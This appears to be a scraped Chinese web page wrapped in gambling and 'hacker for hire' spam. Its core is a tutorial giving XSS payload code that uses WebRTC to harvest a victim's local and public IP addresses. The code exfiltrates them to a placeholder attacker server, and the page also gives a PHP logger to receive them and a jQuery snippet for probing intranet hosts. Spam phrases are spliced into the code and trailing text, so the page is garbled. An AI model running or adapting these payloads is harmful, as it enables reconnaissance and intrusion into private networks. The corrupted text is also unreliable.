|
网上赌博援助组织-Web XSS内网渗透—找寻内部网IP
在BCTF中应用了BeEF,可能是等同于探针一样的东西,可是BeEF应用起來依然繁杂,在web题型中应用BeEF确实屈才,也就是说不太实际,如今先汇总一部分內容到这儿,以便下一次应用。
这一技术性就是 Firefox 和 Chrome 內建的 WebRTC 容许向 STUN 服务器查询客户的当地和公共性 IP 详细地址。查看結果对 javascript 能用,因此 能够应用 javascript 获得客户的当地和公网地址。
瞎折腾了好长时间,js基本较为很差,找到webRTC的完成,根据把回到的結果new Image到我的steal.php再载入到txt中,早已完成检测,立即将一下编码中的url一部分改动就可以应用,期待能给诸位产生便捷。
真正黑客去哪里找 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
5真正黑客去哪里找0
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
//获得IP
function getIPs(callback){
真正黑客去哪里找 var ip_dups ={};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking
if(!RTCPeerConnection){
//create an iframe node var iframe = document.createElement(\“iframe\“);
iframe.style.display = \“none\“;
//invalidate content script
iframe.sandbox = \“allow-same-origin\“;
//insert a listener to cutoff any attempts to
//disable webrtc when inserting to the DOM
iframe.addEventListener(“DOMNodeInserted“, function(e){
e.stopPropagation();
}, false);
iframe.addEventListener(“DOMNodeInsertedIntoDocument“, function(e){
e.stopPropagation();
}, false);
//insert into the DOM and get that iframe\“s webrtc
document.body.appendChild(iframe);
var win = iframe.contentWindow;
真正黑客去哪里找 RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints ={
optional:[{RtpDataChannels: true}]
};
//firefox already has a 真正黑客去哪里找 default stun server in about:config
// media.peerconnection.default_iceservers =
//[{“url“: “stun:stun.services.mozilla.com“}]
var servers = undefined;
//add same stun server for chrome
if(useWebKit)
servers ={iceServers:[{urls: “stun:stun.services.mozilla.com“}]};
//construct a new 真正黑客去哪里找 RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3})/
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr]=== undefined)
真正黑客去哪里找 callback(ip_addr);
ip_dups[ip_addr]= true;
}
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel(““);
真正黑客去哪里找 //create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = 真正黑客去哪里找 pc.localDescription.sdp.split(\“\\“);
lines.forEach(function(line){
if(line.indexOf(\“a=candidate:\“) === 0)
handleCandidate(line);
});
}, 1000);
}
//将結果回到到网络服务器
getIPs(function(ip){
var li = document.createElement(“li“);
li.textContent = ip;
//local IPs
if (ip.match(真正黑客去哪里找/^(192\\.168\\.|169\\.254\\.|10\\.|172\\.(1[6-9]|2\\d|3[01]))/)){
new Image().src=“http://你的服务器ip/接受程序流程?ip=“ escape(ip);
}
//assume the rest are public IPs
else{
new Image().src=“http://你的服务器ip/接受程序流程?ip=“ escape(ip);
}
});
之上编码只必须改动这些就可以,一部分按需改动。
1
真正黑客去哪里找 new Image().src=“http://你的服务器ip/接受程序流程?ip=“ escape(ip);
可是我的接受程序流程的phpdaima
1
2
3
4
5
<?php
$file = fopen(“file.txt“, “a“);
fwrite($file, “\\\ip:“. $_GET[\“ip\“]. “ port:“ .$_GET[\“post\“]);
fclose($file);
?>
这个是针对chrome和firefox浏览器才能使用的,虽然这两个浏览器已经覆盖了绝大多数情况,但是我们还是得需要普通的办法来应对特殊的情况,这里介绍使用JQ库的方法来进行更一般的操作
1
2
3
jQuery.get( “http://192.168.1.1“, function( data ) {
jQuery.post( “http://1.2.3.4/app_dev.php“, { x: “192.168.1.1“} );
});
这个方法请求指定的目标url,然后将请求到的数据post到app_dev.php,上面的php中的get方法换成post即可, { x: “192.168.1.1“} 中的内容可控,可以直接把返回的数据完全返回,但是这里只是请求IP是否存在。
这个方法就是暴力膜。
而这个方法和上面的方法结合使用,也可以在获取到内网IP的情况下猜测端口,获取指定端口的返回数据,应用就更多啦。
若有再补充。
还找到了个利用js渗透内网的poc,获取flash版本java版本之类的,放个链接给大家参考下。
1
2
3
4
5
6
7
8
9
10
11
12
13
获得flash版本 http://jsbin.com/rukirayuca
获得java版本 http://jsbin.com/cabirudale
获得插件列表 http://jsbin.com/vejujatuxa
获得内网IP http://jsbin.com/riyisavura
扫描HTTP端口 http://jsbin.com/ziwununivo
扫描WEB容器 http://jsbin.com/piwemaquwa
扫描FTP端口 http://jsbin.com/kulahicide
还有就是希望谁能来补充一下利用curl反向代理渗透内网的方法,我认为这个原理大同小真实黑客去哪里找异,仍然是暴力膜..但是webRTC是一个很重要的技巧,这里着重介绍。
*信息源:http://www.s2.sshz.org/post/intranet-ip/
《五路追杀令》2006共2部导演乔·卡纳汉编剧乔·卡纳汉主演瑞恩·雷诺兹/雷·利奥塔/本·阿弗莱克/彼得·博格/安迪·加西亚/。网赌救助机构
手机黑客十大软件下载不可以防黑客攻击,不需要,一个是主机,一个网络您好,你可以使用大白菜系统,插入U盘然后进入PE系统,清除登陆密码即可,如果没有,那你拿出去重装就行了。没事的。
网赌救助机构当然能啊,你想想美国国防部电脑的什么防火墙什么的多好啊,还不是被破了啊!而且现在都流行不用破密码什么的,都用饶过密码防火墙什么的技术了这是因为每个电脑都有漏洞,而黑客就是利用了这个漏洞。
解锁方法一:刷机重新真实黑客去哪里找输入ROM。可以让设置的密码锁消除,前提是你会刷机。解锁方法二:双wipe从刷机爱好者的专业角度来理解可以认为是一种对手机数据擦除的。
去黑吧论坛找一下吧,那里面关于这类知识的文章有太多了,我都不知道该挑哪一篇给你,祝你好运!网赌救助机构
叫白客,原名罗宏明。是山东泰安人,不是泰安一中的,是肥城第一中学1.万万没想到《万万没想到》是2015年叫兽易小星执导的奇幻喜剧电影,由黄建新监制,韩寒任艺术指导,杨子姗、白客、陈。
网赌救助机构什么是子弹时间?自从《黑客帝国》上映后,“子弹时间”特技似乎成了它的一块招牌,无数影迷只要提起《黑客帝国》,就一定会说到“子弹时间”。而且,该。
(责任编辑:网络) |
|